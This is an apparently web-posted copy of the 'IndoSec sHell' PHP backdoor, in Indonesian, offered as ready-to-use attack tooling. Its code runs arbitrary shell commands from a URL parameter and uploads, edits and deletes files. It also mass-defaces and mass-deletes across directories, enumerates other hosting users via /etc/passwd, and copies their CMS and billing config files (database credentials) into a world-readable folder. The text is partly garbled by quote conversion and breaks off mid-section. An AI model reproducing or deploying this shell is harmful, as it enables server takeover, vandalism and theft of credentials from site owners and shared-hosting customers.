admin

Description

{ IndoSec sHell }

{ INDOSEC }

Shell Backdor

Copyright 2019 @ { IndoSec }

<?php
function w($dir,$perm) {
if(!is_writable($dir)) {
return "“.$perm.”“;
} else {
return ““.$perm.”“;
}
}
function r($dir,$perm) {
if(!is_readable($dir)) {
return ““.$perm.”“;
} else {
return ““.$perm.”“;
}
}

function exe($cmd) {
if(function_exists(‘system’)) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists(‘exec’)) {
@exec($cmd,$results);
$buff = “”;
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists(‘passthru’)) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists(‘shell_exec’)) {
$buff = @shell_exec($cmd);
return $buff;
}
}

function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = ‘s’;
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = ‘l’;
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = ‘-‘;
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = ‘b’;
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = ‘d’;
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = ‘c’;
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = ‘p’;
} else {
// Unknown
$info = ‘u’;
}

// Owner
$info .= (($perms & 0x0100) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0080) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? ‘s’ : ‘x’ ) :
(($perms & 0x0800) ? ‘S’ : ‘-‘));
// Group
$info .= (($perms & 0x0020) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0010) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? ‘s’ : ‘x’ ) :
(($perms & 0x0400) ? ‘S’ : ‘-‘));

// World
$info .= (($perms & 0x0004) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0002) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? ‘t’ : ‘x’ ) :
(($perms & 0x0200) ? ‘T’ : ‘-‘));

return $info;
}

if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
chdir($path);
}else{
$path = getcwd();
}
$path = str_replace(‘\\’,’/’,$path);
$paths = explode(‘/’,$path);
if(isset($_GET[‘dir’])) {
$dir = $_GET[‘dir’];
chdir($dir);
} else {
$dir = getcwd();
}
$os = php_uname();
$ip = getHostByName(getHostName());
$ver = phpversion();
$dom = $_SERVER[‘HTTP_HOST’];
$dir = str_replace(“\\”,”/”,$dir);
$scdir = explode(“/”, $dir);
$mysql = (function_exists(‘mysql_connect’)) ? “ON” : “OFF“;
$curl = (function_exists(‘curl_version’)) ? “ON” : “OFF“;
$total = formatSize(disk_total_space($path));
$free = formatSize(disk_free_space($path));
$total1 = disk_total_space($path);
$free1 = disk_free_space($path);
$used = formatSize($total1 – $free1);
function formatSize( $bytes ) {
$types = array( ‘B’, ‘KB’, ‘MB’, ‘GB’, ‘TB’ );
for( $i = 0; $bytes >= 1024 && $i

{ IndoSec sHell }

$(document).ready(function(){
$(window).scroll(function(){
if ($(this).scrollTop() > 700) {
$(“.scrollToTop”).fadeIn();
}else{
$(“.scrollToTop”).fadeOut();
}
});
$(“.scrollToTop”).click(function(){
$(“html, body”).animate({scrollTop : 0},1000);
return false;
});
});

$(document).ready(function() {
$(‘input[type=”file”]’).on(“change”, function() {
let filenames = [];
let files = document.getElementById(“customFile”).files;
if (files.length > 1) {
filenames.push(“Total Files (” + files.length + “)”);
} else {
for (let i in files) {
if (files.hasOwnProperty(i)) {
filenames.push(files[i].name);
}
}
}
$(this)
.next(“.custom-file-label”)
.html(filenames.join(“,”));
});
});

@import url(https://fonts.googleapis.com/css?family=Lato);
@import url(http://fonts.googleapis.com/css?family=Quicksand);
body{margin:0;padding:0;font-family:”Lato”;}
#tab table thead th{padding:5px;font-size:16px;}
#tab tr {border-bottom:1px solid #fff;}
#tab tr:hover{background:#5B6F7D; color:#fff;}
#tab tr td{padding:5px;}
#tab tr td .badge{font-size:13px;}
.link,
#tab a {color: white;}
.active,.active:hover{color:red;}
a {font-family:”Quicksand”; color:white;}
a:hover{color:dodgerBlue;}
.ico {width:25px;}
.ico2{width:30px;}
.scrollToTop{
position:fixed;
bottom:30px;
right:30px;
width:35px;
height:35px;
background:#262626;
color:#fff;
border-radius:15%;
text-align:center;
opacity:.5;
}
.scrollToTop:hover{color:#fff;}
.up{font-size:20px;line-height:35px;}
.lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
.lain:hover{color:#fff;}
.tambah{
width:35px;
height:35px;
line-height:35px;
border:1px solid;
border-radius:50%;
text-align:center;
}
.fiture{margin:2px;}
.tmp{background:#F4F4F4;}
.tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;}
.about{color:#000;}
.about .card-body .img{
position: relative;
background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
background-size: cover;
width: 150px;
height: 150px;
}
.butn {
position: relative;
text-align: center;
padding: 3px;
background:rgba(225,225,225,.3);
-webkit-transition: background 300ms ease, color 300ms ease;
transition: background 300ms ease, color 300ms ease;
}
input[type=”radio”].toggle {display:none;}
input[type=”radio”].toggle + label {cursor:pointer;margin:0 2px;width:60px;}
input[type=”radio”].toggle + label:after {
position: absolute;
content: “”;
top: 0;
background: #fff;
height: 100%;
width: 100%;
z-index: -1;
-webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
}
input[type=”radio”].toggle.toggle-left + label:after {left:100%;}
input[type=”radio”].toggle.toggle-right + label {margin-left:-5px;}
input[type=”radio”].toggle.toggle-right + label:after {left:-100%;}
input[type=”radio”].toggle:checked + label {cursor:default;color:#000;-webkit-transition:color 400ms;transition: color 400ms;}
input[type=”radio”].toggle:checked + label:after {left:0;}

<?php
echo '

{ INDOSEC }

Shell Backdor

Terminal :

Informasi :
PHP : ‘.$ver.’
IP Server : ‘.$ip.’
HDD Total : ‘.$total.’
Free : ‘.$free.’ [‘.$used.’]
Doamin Web : ‘.$dom.’
MySQL : ‘.$mysql.’
CURL : ‘.$curl.’
Sistem Operasi : ‘.$os.’


‘;

//cmd
if(isset($_GET[‘cmd’])){
echo “

";
			echo system($_GET['cmd']);
			echo "

“;
exit;
}

//keluar
if (isset($_GET[‘keluar’])) {
session_start();
session_destroy();
echo ‘window.location=”?”;’;
}

if (isset($_GET[‘about’])) {
echo ‘

{ IndoSec }

{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.

‘;
exit;
}

//upload
if ($_GET[‘aksi’] == ‘upload’) {
echo ‘

‘;

if(isset($_POST[‘upload’])){
$countfiles = count($_FILES[‘file’][‘name’]);
for($i=0;$i<$countfiles;$i++){
$filename = $_FILES['file']['name'][$i];
$uplo = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename);
}
if($uplo){
echo 'alert(“Berhasil Upload ‘.$countfiles.’ File”);’;
}else{
echo ‘alert(“Gagal Upload!!!”);’;
}
}
}

//openfile
if (isset($_GET[‘file’])) {
$file = $_GET[‘file’];
}

//buat_file
if ($_GET[‘aksi’] == ‘buat_file’) {

$output = ”

Buat File:



“;
echo $output;

if (isset($_POST[‘bikin’])) {
$nama_file = $_POST[‘nama_file’];
$isi_file = $_POST[‘isi_file’];
$handle = fopen(“$nama_file”, “w”);

if (fwrite($handle, $isi_file)) {
echo ‘window.location=”?dir=’.$dir.'”; alert(“Buat File Berhasil”);’;
}else{
echo ‘alert(“File Gagal Dibuat”);’;
}
}
}

/*
View
*/
if($_GET[‘aksi’] == ‘view’) {
echo ‘[ Lihat ] [ Edit ] [ Rename ] [ Delete ]’;
echo ”
“;
}

/*
Edit
*/
if($_GET[‘aksi’] == ‘edit’) {
$nama = basename($file);
echo ‘[ Lihat ] [ Edit ] [ Rename ] [ Delete ]’;
echo ”

Edit File : $nama



“;

if(isset($_POST[‘edit_file’])) {
$updt = fopen(“$file”, “w”);
$hasil = fwrite($updt, $_POST[‘isi’]);

if ($hasil) {
echo ‘window.location=”?dir=’.$dir.'”; alert(“Berhasil Update!!”);’;
}else{
echo ‘alert(“Gagal Update!!”);’;
}
}
}

/*
Rename
*/
if($_GET[‘aksi’] == ‘rename’) {
$nama = basename($file);
echo ‘[ Lihat ] [ Edit ] [ Rename ] [ Delete ]’;
echo ”

Rename File : $nama


“;

if(isset($_POST[‘rename_file’])) {
$lama = $file;
$baru = $_POST[‘namanew’];
rename( $baru, $lama);
if(file_exists($baru)) {
echo ‘alert(“Nama ‘.$baru.’ Telah Digunakan”);’;
}else{
if(rename( $lama, $baru)) {
echo ‘window.location=”?dir=’.$dir.'”; alert(“Sukses Mengganti Nama Menjadi ‘.$baru.'”);’;
}else{
echo ‘alert(“Gagal Mengganti Nama”);’;
}
}
}
}

/*
Delete File
*/
if ($_GET[‘aksi’] == ‘hapusf’) {
$nama = basename($file);
echo ‘[ Lihat ] [ Edit ] [ Rename ] [ Delete ]’;
$output =”


Yakin Menghapus : $nama

Tidak

“;
echo $output;

if ($_POST[‘ya’]) {
$hapus = unlink($file);
if ($hapus) {
echo ‘window.location=”?dir=’.$dir.'”; alert(“Berhasil Menghapus File”);’;
}else{
echo ‘alert(“Gagal Menghapus File!”);’;
}
}
}

/*
Add Folder
*/
if ($_GET[‘aksi’] == ‘buat_folder’ ) {
$output = ”

Buat Folder:


“;
echo $output;

if (isset($_POST[‘buat’])) {
$nama_folder = $_POST[‘nama_folder’];
$folder = preg_replace(“([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})”, ”, $_POST[“nama_folder”]);
$fd = mkdir ($folder);
if ($fd) {
echo ‘window.location=”?dir=’.$dir.'”; alert(“Berhasil Membuat Folder ‘.$folder.'”);’;
}else{
echo “echo ‘ alert(‘Folder “.$folder.” Gagal Dibuat’);”;
}
}
}

/*
Delete Folder
*/
if ($_GET[‘aksi’] == ‘hapus_folder’ ) {
$nama = basename(getcwd());
$output =”
[ Rename ] [ Delete ]


Apakah Yakin Menghapus : $nama ?

Tidak

“;
echo $output;

if ($_POST[‘ya’]) {
if(is_dir($dir)) {
if(is_writable($dir)) {
@rmdir($dir);
@exe(“rm -rf $dir”);
@exe(“rmdir /s /q $dir”);
echo “window.location=’?dir=”.dirname($dir).”‘; alert(‘Berhasil Menghapus “.$nama.”‘);”;
} else {
echo “window.location=’?dir=”.dirname($dir).”‘; alert(‘Tidak Dapat Menghapus “.$nama.”‘);”;
}
}
}
exit;
}

/*
Rename Folder
*/
if ($_GET[‘aksi’] == ‘rename_folder’ ) {
$nama = basename(getcwd());
$output=”
[ Rename ] [ Delete ]

Rename Folder : $nama


“;
echo $output;

if (isset($_POST[‘ganti’])) {
$lama = $dir;
$baru = $_POST[‘namanew’];
$ubah = rename($lama, $baru);
if($ubah) {
echo “window.location=’?dir=”.dirname($dir).”‘; alert(‘Berhasil Mengganti Nama’);”;
}else{
echo “alert(‘Gagal Mengganti Nama’);” ;
}
}
exit;
}

/*
* Fungsi_Tambahan
*
*/

/*
mass delete
*/
if($_GET[‘aksi’] == ‘masdel’) {

function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
if(file_exists(“$dir/$namafile”)) {
unlink(“$dir/$namafile”);
}
} elseif($dirb === ‘..’) {
if(file_exists(“”.dirname($dir).”/$namafile”)) {
unlink(“”.dirname($dir).”/$namafile”);
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if($lokasi) {
echo “$lokasi > Terhapus\n”;
unlink($lokasi);
$massdel = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}

if($_POST[‘start’]) {
echo “[ Kembali ]

“;
} else {
echo ”

Lokasi :

Nama File :

“;
}
exit;
}

/*
Mass Deface
*/
if($_GET[‘aksi’] == ‘masdef’) {

function tipe_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “Done > $lokasi\n”;
file_put_contents($lokasi, $isi_script);
$masdef = tipe_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}

function tipe_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = “$dir/$dirb”;
$lokasi = $dirc.’/’.$namafile;
if($dirb === ‘.’) {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === ‘..’) {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo “Done > $dirb/$namafile\n”;
file_put_contents($lokasi, $isi_script);
}else{
echo “

gagal

“;
}
}
}
}
}
}

if($_POST[‘start’]) {
echo “[ Kembali ]

“;
} else {
echo ”

Tipe :

Lokasi :

Nama File :

Isi File :

“;
}
exit;
}

/*
Jumping
*/
if($_GET[‘aksi’] == ‘jumping’) {
$i = 0;
echo “

“;
if(preg_match(“/hsphere/”, $dir)) {
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo “

";
				foreach($urls as $url) {
					$url = str_replace(array("http://","www."), "", strtolower($url));
					$etc = "/etc/passwd";
					$f = fopen($etc,"r");
					while($gets = fgets($f)) {
						$pecah = explode(":", $gets);
						$user = $pecah[0];
						$dir_user = "/hsphere/local/home/$user";
						if(is_dir($dir_user) === true) {
							$url_user = $dir_user."/".$url;
							if(is_readable($url_user)) {
								$i++;
								$jrw = "[R] $url_user";
								if(is_writable($url_user)) {
									$jrw = "[RW] $url_user";
								}
								echo $jrw."
"; } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "

“;
} else {
echo ‘

List Domains:

‘;
}
} elseif(preg_match(“/vhosts/”, $dir)) {
$urls = explode(“\r\n”, $_POST[‘url’]);
if(isset($_POST[‘jump’])) {
echo “

";
				foreach($urls as $url) {
					$web_vh = "/var/www/vhosts/$url/httpdocs";
					if(is_dir($web_vh) === true) {
						if(is_readable($web_vh)) {
							$i++;
							$jrw = "[R] $web_vh";
							if(is_writable($web_vh)) {
								$jrw = "[RW] $web_vh";
							}
							echo $jrw."
"; } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "

“;
} else {
echo ‘

List Domains:

‘;
}
} else {
echo “

";
			$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd
"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd
"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_pro_jump) { $user_jumping_dir = "/home/$user_pro_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists('posix_getpwuid')) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_pro_jump) { echo " => ( $dj )
"; break; } } } } else { echo "
"; } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "

“;
}
echo “

“;
exit;
}

/*
Config
*/
if($_GET[‘aksi’] == ‘config’) {
$etc = fopen(“/etc/passwd”, “r”) or die(“

Can't read /etc/passwd

“);
$con = mkdir(“indosec_config”, 0777);
$isi_htc = “Options all\nRequire None\nSatisfy Any”;
$htc = fopen(“indosec_config/.htaccess”,”w”);
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == “” || !$etc) {
echo “Can’t read /etc/passwd“;
} else {
preg_match_all(‘/(.*?):x:/’, $passwd, $user_config);
foreach($user_config[1] as $user_con) {
$user_config_dir = “/home/$user_con/public_html/”;
if(is_readable($user_config_dir)) {
$grab_config =
[
“/home/$user_con/.my.cnf” => “cpanel”,
“/home/$user_con/public_html/config/koneksi.php” => “Lokomedia”,
“/home/$user_con/public_html/forum/config.php” => “phpBB”,
“/home/$user_con/public_html/sites/default/settings.php” => “Drupal”,
“/home/$user_con/public_html/config/settings.inc.php” => “PrestaShop”,
“/home/$user_con/public_html/app/etc/local.xml” => “Magento”,
“/home/$user_con/public_html/admin/config.php” => “OpenCart”,
“/home/$user_con/public_html/application/config/database.php” => “Ellislab”,
“/home/$user_con/public_html/vb/includes/config.php” => “Vbulletin”,
“/home/$user_con/public_html/includes/config.php” => “Vbulletin”,
“/home/$user_con/public_html/forum/includes/config.php” => “Vbulletin”,
“/home/$user_con/public_html/forums/includes/config.php” => “Vbulletin”,
“/home/$user_con/public_html/cc/includes/config.php” => “Vbulletin”,
“/home/$user_con/public_html/inc/config.php” => “MyBB”,
“/home/$user_con/public_html/includes/configure.php” => “OsCommerce”,
“/home/$user_con/public_html/shop/includes/configure.php” => “OsCommerce”,
“/home/$user_con/public_html/os/includes/configure.php” => “OsCommerce”,
“/home/$user_con/public_html/oscom/includes/configure.php” => “OsCommerce”,
“/home/$user_con/public_html/products/includes/configure.php” => “OsCommerce”,
“/home/$user_con/public_html/cart/includes/configure.php” => “OsCommerce”,
“/home/$user_con/public_html/inc/conf_global.php” => “IPB”,
“/home/$user_con/public_html/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/wp/test/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/blog/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/beta/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/portal/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/site/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/wp/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/WP/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/news/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/wordpress/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/test/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/demo/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/home/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/v1/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/v2/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/press/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/new/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/blogs/wp-config.php” => “WordPress”,
“/home/$user_con/public_html/configuration.php” => “Joomla”,
“/home/$user_con/public_html/blog/configuration.php” => “Joomla”,
“/home/$user_con/public_html/submitticket.php” => “^WHMCS”,
“/home/$user_con/public_html/cms/configuration.php” => “Joomla”,
“/home/$user_con/public_html/beta/configuration.php” => “Joomla”,
“/home/$user_con/public_html/portal/configuration.php” => “Joomla”,
“/home/$user_con/public_html/site/configuration.php” => “Joomla”,
“/home/$user_con/public_html/main/configuration.php” => “Joomla”,
“/home/$user_con/public_html/home/configuration.php” => “Joomla”,
“/home/$user_con/public_html/demo/configuration.php” => “Joomla”,
“/home/$user_con/public_html/test/configuration.php” => “Joomla”,
“/home/$user_con/public_html/v1/configuration.php” => “Joomla”,
“/home/$user_con/public_html/v2/configuration.php” => “Joomla”,
“/home/$user_con/public_html/joomla/configuration.php” => “Joomla”,
“/home/$user_con/public_html/new/configuration.php” => “Joomla”,
“/home/$user_con/public_html/WHMCS/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/whmcs1/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Whmcs/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/whmcs/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/whmcs/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/WHMC/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Whmc/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/whmc/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/WHM/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Whm/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/whm/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/HOST/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Host/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/host/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/SUPPORTES/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Supportes/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/supportes/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/domains/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/domain/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Hosting/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/HOSTING/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/hosting/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/CART/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Cart/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/cart/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/ORDER/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Order/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/order/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/CLIENT/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Client/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/client/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/CLIENTAREA/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Clientarea/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/clientarea/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/SUPPORT/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Support/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/support/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/BILLING/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Billing/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/billing/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/BUY/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Buy/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/buy/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/MANAGE/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Manage/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/manage/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/ClientSupport/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Clientsupport/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/clientsupport/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/CHECKOUT/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Checkout/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/checkout/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/BILLINGS/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Billings/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/billings/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/BASKET/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Basket/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/basket/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/SECURE/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Secure/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/secure/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/SALES/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Sales/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/sales/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/BILL/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Bill/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/bill/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/PURCHASE/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Purchase/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/purchase/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/ACCOUNT/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Account/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/account/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/USER/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/User/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/user/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/CLIENTS/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Clients/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/clients/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/BILLINGS/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/Billings/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/billings/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/MY/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/My/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/my/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/secure/whm/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/secure/whmcs/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/panel/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/clientes/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/cliente/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/support/order/submitticket.php” => “WHMCS”,
“/home/$user_con/public_html/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/boxbilling/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/box/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/host/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/Host/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/supportes/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/support/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/hosting/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/cart/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/order/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/client/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/clients/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/cliente/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/clientes/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/billing/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/billings/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/my/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/secure/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/support/order/bb-config.php” => “BoxBilling”,
“/home/$user_con/public_html/includes/dist-configure.php” => “Zencart”,
“/home/$user_con/public_html/zencart/includes/dist-configure.php” => “Zencart”,
“/home/$user_con/public_html/products/includes/dist-configure.php” => “Zencart”,
“/home/$user_con/public_html/cart/includes/dist-configure.php” => “Zencart”,
“/home/$user_con/public_html/shop/includes/dist-configure.php” => “Zencart”,
“/home/$user_con/public_html/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/hostbills/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/host/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/Host/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/supportes/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/support/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/hosting/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/cart/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/order/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/client/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/clients/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/cliente/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/clientes/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/billing/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/billings/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/my/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/secure/includes/iso4217.php” => “Hostbills”,
“/home/$user_con/public_html/support/order/includes/iso4217.php” => “Hostbills”
];
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == ”) {
} else {
$file_config = fopen(“indosec_config/$user_con-$nama_config.txt”,”w”);
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo “Done“;
exit;
}

/*
Adminer
*/
if($_GET[‘aksi’] == ‘adminer’) {
